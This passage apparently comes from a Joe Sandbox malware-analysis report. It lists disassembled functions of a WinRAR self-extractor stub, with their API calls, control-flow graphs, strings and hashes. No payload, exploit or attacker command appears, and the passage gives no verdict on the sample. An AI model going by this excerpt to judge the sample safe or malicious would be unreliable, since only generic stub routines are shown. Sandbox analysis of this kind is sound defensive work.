                                                                                              • Sleep.KERNEL32(00000064), ref: 0073BCB9
                                                                                              • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0073BCE2
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0073BCEB
                                                                                              • _swprintf.LIBCMT ref: 0073BD1E
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0073BD7D
                                                                                              • SetDlgItemTextW.USER32(?,00000065,007535F4), ref: 0073BD94
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 0073BD9D
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0073BDAC
                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0073BDBB
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0073BE68
                                                                                              • _wcslen.LIBCMT ref: 0073BEBE
                                                                                              • _swprintf.LIBCMT ref: 0073BEE8
                                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 0073BF32
                                                                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0073BF4C
                                                                                              • GetDlgItem.USER32(?,00000068), ref: 0073BF55
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0073BF6B
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 0073BF85
                                                                                              • SetWindowTextW.USER32(00000000,0076A472), ref: 0073BFA7
                                                                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0073C007
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0073C01A
                                                                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0073C0BD
                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 0073C197
                                                                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0073C1D9
                                                                                                • Part of subcall function 0073C73F: __EH_prolog.LIBCMT ref: 0073C744
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0073C1FD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$ItemSend$Text$Window$_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmap__vswprintf_c_l_wcschr
                                                                                              • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\AppData\Local\Temp\RarSFX1$LICENSEDLG$PDu<s$STARTDLG$^s$__tmp_rar_sfx_access_check_%u$hs$winrarsfxmappingfile.tmp$Qu
                                                                                              • API String ID: 4093411769-3706725595
                                                                                              • Opcode ID: 50e4ab125df4b1a5d3c8b089f49e8b5ff65317a735412f1585aaaf729c8a25ba
                                                                                              • Instruction ID: 0d9ac4ed9b2ee2f1ffaacead047d36450ce664eda37f6f93e760c6712464fb7c
                                                                                              • Opcode Fuzzy Hash: 50e4ab125df4b1a5d3c8b089f49e8b5ff65317a735412f1585aaaf729c8a25ba
                                                                                              • Instruction Fuzzy Hash: E242E4B1940358FAFB229B749C4EFBE3B6CAB01B40F108155F645B60D3DBBC5A448B66
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00730863 Relevance: 98.3, APIs: 23, Strings: 33, Instructions: 316libraryfileloaderCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 269 730863-730886 call 73ec50 GetModuleHandleW 272 7308e7-730b48 269->272 273 730888-73089f GetProcAddress 269->273 274 730c14-730c40 GetModuleFileNameW call 72c29a call 730602 272->274 275 730b4e-730b59 call 7475fb 272->275 276 7308a1-7308b7 273->276 277 7308b9-7308c9 GetProcAddress 273->277 291 730c42-730c4e call 72b146 274->291 275->274 286 730b5f-730b8d GetModuleFileNameW CreateFileW 275->286 276->277 279 7308e5 277->279 280 7308cb-7308e0 277->280 279->272 280->279 289 730c08-730c0f CloseHandle 286->289 290 730b8f-730b9b SetFilePointer 286->290 289->274 290->289 292 730b9d-730bb9 ReadFile 290->292 298 730c50-730c5b call 73081b 291->298 299 730c7d-730ca4 call 72c310 GetFileAttributesW 291->299 292->289 295 730bbb-730be0 292->295 297 730bfd-730c06 call 730371 295->297 297->289 306 730be2-730bfc call 73081b 297->306 298->299 308 730c5d-730c7b CompareStringW 298->308 309 730ca6-730caa 299->309 310 730cae 299->310 306->297 308->299 308->309 309->291 313 730cac 309->313 311 730cb0-730cb5 310->311 314 730cb7 311->314 315 730cec-730cee 311->315 313->311 316 730cb9-730ce0 call 72c310 GetFileAttributesW 314->316 317 730cf4-730d0b call 72c2e4 call 72b146 315->317 318 730dfb-730e05 315->318 323 730ce2-730ce6 316->323 324 730cea 316->324 328 730d73-730da6 call 724092 AllocConsole 317->328 329 730d0d-730d6e call 73081b * 2 call 72e617 call 724092 call 72e617 call 73a7e4 317->329 323->316 326 730ce8 323->326 324->315 326->315 335 730df3-730df5 ExitProcess 328->335 336 730da8-730ded GetCurrentProcessId AttachConsole call 743e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->336 329->335 336->335
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32), ref: 0073087C
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0073088E
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 007308BF
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00730B69
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00730B83
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00730B93
                                                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,|<u,00000000), ref: 00730BB1
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00730C09
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00730C1E
                                                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<u,?,00000000,?,00000800), ref: 00730C72
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,|<u,00000800,?,00000000,?,00000800), ref: 00730C9C
                                                                                              • GetFileAttributesW.KERNEL32(?,?,D=u,00000800), ref: 00730CD8
                                                                                                • Part of subcall function 0073081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00730836
                                                                                                • Part of subcall function 0073081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0072F2D8,Crypt32.dll,00000000,0072F35C,?,?,0072F33E,?,?,?), ref: 00730858
                                                                                              • _swprintf.LIBCMT ref: 00730D4A
                                                                                              • _swprintf.LIBCMT ref: 00730D96
                                                                                                • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
                                                                                              • AllocConsole.KERNEL32 ref: 00730D9E
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00730DA8
                                                                                              • AttachConsole.KERNEL32(00000000), ref: 00730DAF
                                                                                              • _wcslen.LIBCMT ref: 00730DC4
                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00730DD5
                                                                                              • WriteConsoleW.KERNEL32(00000000), ref: 00730DDC
                                                                                              • Sleep.KERNEL32(00002710), ref: 00730DE7
                                                                                              • FreeConsole.KERNEL32 ref: 00730DED
                                                                                              • ExitProcess.KERNEL32 ref: 00730DF5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                              • String ID: (=u$,<u$,@u$0?u$0Au$4Bu$8>u$D=u$DXGIDebug.dll$H?u$H@u$HAu$P>u$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=u$`@u$d?u$dAu$dwmapi.dll$h=u$h>u$kernel32$uxtheme.dll$|<u$|?u$|@u$<u$>u$?u$@u$Au
                                                                                              • API String ID: 1207345701-1434987480
                                                                                              • Opcode ID: 62b9cfc8fd23f7d095fdd5e9f35b9c716cbce943582b07c91335e25dc5599654
                                                                                              • Instruction ID: 9f8f0f58f41ba286ac0de05155314819ad34727560f3c18d7c68244d78ac29bf
                                                                                              • Opcode Fuzzy Hash: 62b9cfc8fd23f7d095fdd5e9f35b9c716cbce943582b07c91335e25dc5599654
                                                                                              • Instruction Fuzzy Hash: 56D1A6B1008384ABD3219F50C859BDFB7F8BB84746F50492DF989961A1D7FC864CCBA6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073C73F Relevance: 51.2, APIs: 23, Strings: 6, Instructions: 428windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 348 73c73f-73c757 call 73eb78 call 73ec50 353 73d40d-73d418 348->353 354 73c75d-73c787 call 73b314 348->354 354->353 357 73c78d-73c792 354->357 358 73c793-73c7a1 357->358 359 73c7a2-73c7b7 call 73af98 358->359 362 73c7b9 359->362 363 73c7bb-73c7d0 call 731fbb 362->363 366 73c7d2-73c7d6 363->366 367 73c7dd-73c7e0 363->367 366->363 368 73c7d8 366->368 369 73c7e6 367->369 370 73d3d9-73d404 call 73b314 367->370 368->370 371 73ca5f-73ca61 369->371 372 73c9be-73c9c0 369->372 373 73c7ed-73c7f0 369->373 374 73ca7c-73ca7e 369->374 370->358 385 73d40a-73d40c 370->385 371->370 376 73ca67-73ca77 SetWindowTextW 371->376 372->370 378 73c9c6-73c9d2 372->378 373->370 379 73c7f6-73c850 call 73a64d call 72bdf3 call 72a544 call 72a67e call 726edb 373->379 374->370 377 73ca84-73ca8b 374->377 376->370 377->370 381 73ca91-73caaa 377->381 382 73c9e6-73c9eb 378->382 383 73c9d4-73c9e5 call 747686 378->383 436 73c98f-73c9a4 call 72a5d1 379->436 386 73cab2-73cac0 call 743e13 381->386 387 73caac 381->387 390 73c9f5-73ca00 call 73b48e 382->390 391 73c9ed-73c9f3 382->391 383->382 385->353 386->370 405 73cac6-73cacf 386->405 387->386 392 73ca05-73ca07 390->392 391->392 398 73ca12-73ca32 call 743e13 call 743e3e 392->398 399 73ca09-73ca10 call 743e13 392->399 425 73ca34-73ca3b 398->425 426 73ca4b-73ca4d 398->426 399->398 409 73cad1-73cad5 405->409 410 73caf8-73cafb 405->410 411 73cb01-73cb04 409->411 412 73cad7-73cadf 409->412 410->411 414 73cbe0-73cbee call 730602 410->414 419 73cb11-73cb2c 411->419 420 73cb06-73cb0b 411->420 412->370 417 73cae5-73caf3 call 730602 412->417 427 73cbf0-73cc04 call 74279b 414->427 417->427 437 73cb76-73cb7d 419->437 438 73cb2e-73cb68 419->438 420->414 420->419 432 73ca42-73ca4a call 747686 425->432 433 73ca3d-73ca3f 425->433 426->370 428 73ca53-73ca5a call 743e2e 426->428 447 73cc11-73cc62 call 730602 call 73b1be GetDlgItem SetWindowTextW SendMessageW call 743e49 427->447 448 73cc06-73cc0a 427->448 428->370 432->426 433->432 454 73c855-73c869 SetFileAttributesW 436->454 455 73c9aa-73c9b9 call 72a55a 436->455 441 73cbab-73cbce call 743e13 * 2 437->441 442 73cb7f-73cb97 call 743e13 437->442 471 73cb6a 438->471 472 73cb6c-73cb6e 438->472 441->427 476 73cbd0-73cbde call 7305da 441->476 442->441 458 73cb99-73cba6 call 7305da 442->458 482 73cc67-73cc6b 447->482 448->447 453 73cc0c-73cc0e 448->453 453->447 459 73c90f-73c91f GetFileAttributesW 454->459 460 73c86f-73c8a2 call 72b991 call 72b690 call 743e13 454->460 455->370 458->441 459->436 469 73c921-73c930 DeleteFileW 459->469 492 73c8b5-73c8c3 call 72bdb4 460->492 493 73c8a4-73c8b3 call 743e13 460->493 469->436 475 73c932-73c935 469->475 471->472 472->437 479 73c939-73c965 call 724092 GetFileAttributesW 475->479 476->427 488 73c937-73c938 479->488 489 73c967-73c97d MoveFileW 479->489 482->370 487 73cc71-73cc85 SendMessageW 482->487 487->370 488->479 489->436 491 73c97f-73c989 MoveFileExW 489->491 491->436 492->455 498 73c8c9-73c908 call 743e13 call 73fff0 492->498 493->492 493->498 498->459
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0073C744
                                                                                                • Part of subcall function 0073B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0073B3FB
                                                                                                • Part of subcall function 0073AF98: _wcschr.LIBVCRUNTIME ref: 0073B033
                                                                                              • _wcslen.LIBCMT ref: 0073CA0A
                                                                                              • _wcslen.LIBCMT ref: 0073CA13
                                                                                              • SetWindowTextW.USER32(?,?), ref: 0073CA71
                                                                                              • _wcslen.LIBCMT ref: 0073CAB3
                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 0073CBFB
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 0073CC36
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 0073CC46
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,0076A472), ref: 0073CC54
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0073CC7F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                                                              • String ID: %s.%d.tmp$<br>$<s$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$s
                                                                                              • API String ID: 986293930-1073329622
                                                                                              • Opcode ID: 15423c9eda76cb862de3b56580f74ef1fb0409c84fbfe36a9d4ff2aa8653699e
                                                                                              • Instruction ID: e40e13d8eb6ae6d22bb53e2ebe97b4a4424021efc913dc6c98eca459f6b86cd9
                                                                                              • Opcode Fuzzy Hash: 15423c9eda76cb862de3b56580f74ef1fb0409c84fbfe36a9d4ff2aa8653699e
                                                                                              • Instruction Fuzzy Hash: 15E167B2900218EAEF25DB64DD49EEE73BCAB04350F1080A5F649E7051EB7C9F848F61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0072DA67 Relevance: 26.9, APIs: 5, Strings: 10, Instructions: 663COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0072DA70
                                                                                              • _wcschr.LIBVCRUNTIME ref: 0072DA91
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0072DAAC
                                                                                                • Part of subcall function 0072C29A: _wcslen.LIBCMT ref: 0072C2A2
                                                                                                • Part of subcall function 007305DA: _wcslen.LIBCMT ref: 007305E0
                                                                                                • Part of subcall function 00731B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0072BAE9,00000000,?,?,?,000104AA), ref: 00731BA0
                                                                                              • _wcslen.LIBCMT ref: 0072DDE9
                                                                                              • __fprintf_l.LIBCMT ref: 0072DF1C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                                              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9u
                                                                                              • API String ID: 557298264-2633427365
                                                                                              • Opcode ID: ff9419c86500eb6af1173b37a9b706e3d8a57c3c729fe51a29683503e04ea166
                                                                                              • Instruction ID: 18da48c45fd7e43d52ab7b3aec034183b8ff0db95df85e477d57db244e8214ef
                                                                                              • Opcode Fuzzy Hash: ff9419c86500eb6af1173b37a9b706e3d8a57c3c729fe51a29683503e04ea166
                                                                                              • Instruction Fuzzy Hash: 6632E171900228DBDF34EF68E845BEE77A5FF04300F50416AF90697291E7B99D85CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 0073B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0073B579
                                                                                                • Part of subcall function 0073B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0073B58A
                                                                                                • Part of subcall function 0073B568: IsDialogMessageW.USER32(000104AA,?), ref: 0073B59E
                                                                                                • Part of subcall function 0073B568: TranslateMessage.USER32(?), ref: 0073B5AC
                                                                                                • Part of subcall function 0073B568: DispatchMessageW.USER32(?), ref: 0073B5B6
                                                                                              • GetDlgItem.USER32(00000068,0077FCB8), ref: 0073D4E8
                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,0073AF07,00000001,?,?,0073B7B9,0075506C,0077FCB8,0077FCB8,00001000,00000000,00000000), ref: 0073D510
                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0073D51B
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,007535F4), ref: 0073D529
                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0073D53F
                                                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0073D559
                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0073D59D
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0073D5AB
                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0073D5BA
                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0073D5E1
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,007543F4), ref: 0073D5F0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                              • String ID: \
                                                                                              • API String ID: 3569833718-2967466578
                                                                                              • Opcode ID: 01802bda7270e45dcc833d630d823a4a95868bc8fe1fe530722f326c053f7754
                                                                                              • Instruction ID: b9fbe9379c3485a830858ffac9974e65971657f74c6c3bca83318dbd1a8ff926
                                                                                              • Opcode Fuzzy Hash: 01802bda7270e45dcc833d630d823a4a95868bc8fe1fe530722f326c053f7754
                                                                                              • Instruction Fuzzy Hash: 8031F571185741BFE301DF24DC4AFAB7FADEB86B04F104508F551961D1DB688A08877B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073D78F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 184COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 813 73d78f-73d7a7 call 73ec50 816 73d9e8-73d9f0 813->816 817 73d7ad-73d7b9 call 743e13 813->817 817->816 820 73d7bf-73d7e7 call 73fff0 817->820 823 73d7f1-73d7ff 820->823 824 73d7e9 820->824 825 73d812-73d818 823->825 826 73d801-73d804 823->826 824->823 828 73d85b-73d85e 825->828 827 73d808-73d80e 826->827 829 73d810 827->829 830 73d837-73d844 827->830 828->827 831 73d860-73d866 828->831 832 73d822-73d82c 829->832 833 73d9c0-73d9c2 830->833 834 73d84a-73d84e 830->834 835 73d868-73d86b 831->835 836 73d86d-73d86f 831->836 839 73d81a-73d820 832->839 840 73d82e 832->840 841 73d9c6 833->841 834->841 842 73d854-73d859 834->842 835->836 837 73d882-73d898 call 72b92d 835->837 836->837 838 73d871-73d878 836->838 849 73d8b1-73d8bc call 72a231 837->849 850 73d89a-73d8a7 call 731fbb 837->850 838->837 843 73d87a 838->843 839->832 845 73d830-73d833 839->845 840->830 847 73d9cf 841->847 842->828 843->837 845->830 848 73d9d6-73d9d8 847->848 851 73d9e7 848->851 852 73d9da-73d9dc 848->852 859 73d8d9-73d8dd 849->859 860 73d8be-73d8d5 call 72b6c4 849->860 850->849 858 73d8a9 850->858 851->816 852->851 855 73d9de-73d9e1 ShowWindow 852->855 855->851 858->849 862 73d8e4-73d8e6 859->862 860->859 862->851 864 73d8ec-73d8f9 862->864 865 73d8fb-73d902 864->865 866 73d90c-73d90e 864->866 865->866 867 73d904-73d90a 865->867 868 73d910-73d919 866->868 869 73d925-73d944 call 73dc3b 866->869 867->866 870 73d97b-73d987 CloseHandle 867->870 868->869 877 73d91b-73d923 ShowWindow 868->877 869->870 883 73d946-73d94e 869->883 871 73d989-73d996 call 731fbb 870->871 872 73d998-73d9a6 870->872 871->847 871->872 872->848 876 73d9a8-73d9aa 872->876 876->848 880 73d9ac-73d9b2 876->880 877->869 880->848 882 73d9b4-73d9be 880->882 882->848 883->870 884 73d950-73d961 GetExitCodeProcess 883->884 884->870 885 73d963-73d96d 884->885 886 73d974 885->886 887 73d96f 885->887 886->870 887->886
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 0073D7AE
                                                                                              • ShellExecuteExW.SHELL32(?), ref: 0073D8DE
                                                                                              • ShowWindow.USER32(?,00000000), ref: 0073D91D
                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 0073D959
                                                                                              • CloseHandle.KERNEL32(?), ref: 0073D97F
                                                                                              • ShowWindow.USER32(?,00000001), ref: 0073D9E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                              • String ID: .exe$.inf$PDu<s$hs$rs
                                                                                              • API String ID: 36480843-1355383514
                                                                                              • Opcode ID: bb867f87618d10da924d9f522700f7e6057d0d07c7a0cd566c6162c6b0560b70
                                                                                              • Instruction ID: 02014bd91de949bd77be2867eede28e845855f5427e9e2b43baca96f0aae550a
                                                                                              • Opcode Fuzzy Hash: bb867f87618d10da924d9f522700f7e6057d0d07c7a0cd566c6162c6b0560b70
                                                                                              • Instruction Fuzzy Hash: CE5115704083849AFB319B24F8447AB7BE4EF41744F04481EF9C5971A2E7BDAE84CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073A6C2 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100memorywindowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 888 73a6c2-73a6df FindResourceW 889 73a6e5-73a6f6 SizeofResource 888->889 890 73a7db 888->890 889->890 892 73a6fc-73a70b LoadResource 889->892 891 73a7dd-73a7e1 890->891 892->890 893 73a711-73a71c LockResource 892->893 893->890 894 73a722-73a737 GlobalAlloc 893->894 895 73a7d3-73a7d9 894->895 896 73a73d-73a746 GlobalLock 894->896 895->891 897 73a7cc-73a7cd GlobalFree 896->897 898 73a74c-73a76a call 740320 896->898 897->895 902 73a7c5-73a7c6 GlobalUnlock 898->902 903 73a76c-73a78e call 73a626 898->903 902->897 903->902 908 73a790-73a798 903->908 909 73a7b3-73a7c1 908->909 910 73a79a-73a7ae GdipCreateHBITMAPFromBitmap 908->910 909->902 910->909 911 73a7b0 910->911 911->909
                                                                                              APIs
                                                                                              • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0073B73D,00000066), ref: 0073A6D5
                                                                                              • SizeofResource.KERNEL32(00000000,?,?,?,0073B73D,00000066), ref: 0073A6EC
                                                                                              • LoadResource.KERNEL32(00000000,?,?,?,0073B73D,00000066), ref: 0073A703
                                                                                              • LockResource.KERNEL32(00000000,?,?,?,0073B73D,00000066), ref: 0073A712
                                                                                              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0073B73D,00000066), ref: 0073A72D
                                                                                              • GlobalLock.KERNEL32(00000000,?,?,?,?,?,0073B73D,00000066), ref: 0073A73E
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0073A7C6
                                                                                                • Part of subcall function 0073A626: GdipAlloc.GDIPLUS(00000010), ref: 0073A62C
                                                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0073A7A7
